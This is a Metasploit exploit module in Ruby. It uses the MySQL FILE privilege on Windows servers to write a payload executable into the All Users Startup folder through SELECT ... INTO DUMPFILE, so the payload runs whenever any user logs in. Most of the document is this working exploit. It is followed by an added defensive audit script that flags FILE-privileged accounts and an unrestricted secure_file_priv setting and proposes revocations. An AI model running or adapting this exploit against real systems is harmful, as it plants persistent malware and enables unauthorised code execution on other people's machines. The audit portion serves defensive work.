##
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse',
      'Description'    => %q{
        This module takes advantage of a file privilege misconfiguration problem
        specifically against Windows MySQL servers. This module abuses the FILE
        privilege to write a payload to Microsoft's All Users Start Up directory
        which will execute every time a user logs in. The default All Users Start
        Up directory used by the module is Windows 7 friendly.
      },
      'Author'         =>
        [
          'sinn3r',
          'Sean Verity <veritysr1980[at]gmail.com>'
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => 'true'
        },
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2012-5613'], # DISPUTED
          ['OSVDB', '88118'],
          ['EDB', '23083'],
          ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MySQL on Windows', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 01 2012'
    ))

    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
        OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/'])
      ])
  end

  def check
    m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
    return Exploit::CheckCode::Safe unless m
    return Exploit::CheckCode::Appears if is_windows?

    Exploit::CheckCode::Safe
  end

  def peer
    "#{rhost}:#{rport}"
  end

  # Run a query and collect the result rows as hashes. An empty array is
  # returned when the query produces no result set or fails to parse.
  def query(q)
    rows = []
    begin
      res = mysql_query(q)
      return rows unless res
      res.each_hash do |row|
        rows << row
      end
    rescue RbMysql::ParseError
      return rows
    end
    rows
  end

  # @@version_compile_os begins with "Win" on Windows builds of MySQL.
  def is_windows?
    r = query("SELECT @@version_compile_os;")
    return false if r.empty?
    r[0]['@@version_compile_os'] =~ /^Win/ ? true : false
  end

  # Derive the drive letter from the server's tmpdir (e.g. "C:/Windows/Temp").
  def get_drive_letter
    r = query("SELECT @@tmpdir;")
    drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || ''
    drive
  end

  # Write the binary to dest with SELECT ... INTO DUMPFILE, which is what the
  # FILE privilege permits.
  def upload_file(bin, dest)
    p = bin.unpack("H*")[0]
    query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
  end

  def exploit
    unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/')
      fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/")
    end

    print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
    begin
      m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
    rescue RbMysql::AccessDeniedError
      fail_with(Failure::NoAccess, "#{peer} - Access denied")
    end
    fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m

    unless is_windows?
      fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows")
    end

    begin
      drive = get_drive_letter
    rescue RbMysql::ParseError
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name")
    end
    # get_drive_letter returns '' (truthy in Ruby) when no letter was found,
    # so test for an empty string rather than for nil.
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") if drive.nil? || drive.empty?

    exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
    dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}"
    exe = generate_payload_exe

    print_status("#{peer} - Uploading to '#{dest}'")
    begin
      upload_file(exe, dest)
    rescue RbMysql::AccessDeniedError
      fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)")
    end

    register_file_for_cleanup("#{dest}")
  end
end
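The misconfiguration the module above depends on is a MySQL account holding the global FILE privilege on a server whose `secure_file_priv` setting does not confine where `SELECT ... INTO DUMPFILE` may write. The following audit helper is an added example for defenders and is not part of the Metasploit module or the Metasploit project; it assumes the auditor has already run `SELECT user, host, File_priv FROM mysql.user;` and `SELECT @@secure_file_priv;` and feeds the results in as plain Ruby values (the sample rows below are constructed, not taken from any real server).

```ruby
# Constructed sample of rows as returned by
#   SELECT user, host, File_priv FROM mysql.user;
# on a server under audit. Values are invented for illustration.
SAMPLE_USER_ROWS = [
  { 'user' => 'root',     'host' => 'localhost', 'File_priv' => 'Y' },
  { 'user' => 'webapp',   'host' => '%',         'File_priv' => 'Y' },
  { 'user' => 'reporter', 'host' => '10.0.0.%',  'File_priv' => 'N' }
].freeze

# Interpret the @@secure_file_priv value:
#   NULL   -> file import/export statements are refused entirely
#   ''     -> no restriction; INTO DUMPFILE may write anywhere the server process can
#   <path> -> writes are confined to that directory
def secure_file_priv_status(value)
  case value
  when nil then :disabled
  when ''  then :unrestricted
  else          :restricted
  end
end

# Accounts that hold the global FILE privilege, as 'user'@'host' labels.
def file_priv_accounts(rows)
  rows.select { |r| r['File_priv'] == 'Y' }
      .map { |r| "#{r['user']}@#{r['host']}" }
end

# Combine both facts into a finding. FILE only becomes a write-anywhere
# primitive when secure_file_priv leaves the destination unconstrained, so the
# risk rating depends on the pairing rather than on either value alone.
def audit_file_privilege(rows, secure_file_priv)
  accounts = file_priv_accounts(rows)
  status   = secure_file_priv_status(secure_file_priv)

  risk =
    if accounts.empty? || status == :disabled
      :low
    elsif status == :unrestricted
      :high
    else
      :medium
    end

  # Remediation statements an administrator could review; root@localhost is
  # typically left alone, every other FILE holder is proposed for revocation.
  revoke_statements = rows
    .select { |r| r['File_priv'] == 'Y' && !(r['user'] == 'root' && r['host'] == 'localhost') }
    .map { |r| "REVOKE FILE ON *.* FROM '#{r['user']}'@'#{r['host']}';" }

  {
    status: status,
    accounts: accounts,
    risk: risk,
    revoke_statements: revoke_statements
  }
end

if $PROGRAM_NAME == __FILE__
  result = audit_file_privilege(SAMPLE_USER_ROWS, '')
  puts "secure_file_priv: #{result[:status]}"
  puts "FILE accounts:    #{result[:accounts].join(', ')}"
  puts "risk:             #{result[:risk]}"
  result[:revoke_statements].each { |s| puts "  #{s}" }
end
```

A `:high` finding means exactly the condition this module exploits: at least one FILE-privileged account and no `secure_file_priv` boundary. Setting `secure_file_priv` to a dedicated directory (or leaving it NULL where file import/export is not needed) and revoking FILE from application accounts removes the primitive regardless of the operating system.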